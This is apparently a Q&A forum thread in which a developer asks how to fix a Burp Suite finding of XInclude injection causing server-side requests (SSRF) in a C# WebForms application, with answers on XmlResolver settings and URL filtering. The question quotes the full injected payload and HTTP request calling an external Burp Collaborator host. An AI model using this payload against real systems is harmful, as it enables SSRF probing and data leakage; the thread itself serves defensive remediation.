1

I got this burp vulnerability report - External service interaction (HTTP)

XML is injected in the URL Path. I wonder if anyone have any idea how to prevent this. I'm working in a Web Application using Visual Studio with WebForms C#.

I was thinking maybe it could be prevented from IIS or the web.config file but I'm not sure.

Issue detail It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The payload <xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/> was submitted in the URL path filename. This payload contains some XML with an XInclude expression that references a URL on an external domain.

The application performed an HTTP request to the specified domain, indicating that the XML parser processed the injected XInclude definition.

GET /EmployeeDetails/%3cuhz%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo%22/%3e%3c/uhz%3e?RequestId=428 HTTP/1.1 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Connection: close

Jay
  • 69
  • 2
  • 4
  • Must be caused by the xml namespace : xmlns – jdweng Aug 26 '20 at 16:35
  • you could try to use this code: `XmlDocument xmlDoc = new XmlDocument(); xmlDoc.XmlResolver = null; xmlDoc.LoadXml(OurOutputXMLString);` https://stackoverflow.com/questions/14230988/how-to-prevent-xxe-attack-xmldocument-in-net – Jalpa Panchal Aug 27 '20 at 08:50

1 Answers1

2

External Service Interaction or in other words SSRF means that Web Server issues a GET Request on behalf of the user. In your case, the application issues a GET Request on its behalf to the user-provided URL i.e, <xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/>. Depending upon your web application functionality, you may or may not be able to block external URLs. You can follow any of the steps below to prevent this,

  • BlockList or Whitelist domain Names
  • Block/Filter User-Provided URLs.
  • Prevent C# code from issuing GET Request from User-Provided URLs
Usama Azad
  • 21
  • 2
  • Thank you for providing some valuable insight on remediation. I have searched for a couple hours and this was the first list I found to actually provide some helpful insight to resolve. – Jordan_Walters Jun 07 '21 at 13:58
  • @Jordan_Walters Can you please explain what code changes you did to resolve the issue? I am facing similar issue in my .NET web application. – RSB Jun 16 '21 at 16:25
  • @RSB it ended up being a setting in CloudFlare that we were able to utilize. I would look to see if your CDN provider has a solution if possible. – Jordan_Walters Jul 15 '21 at 17:06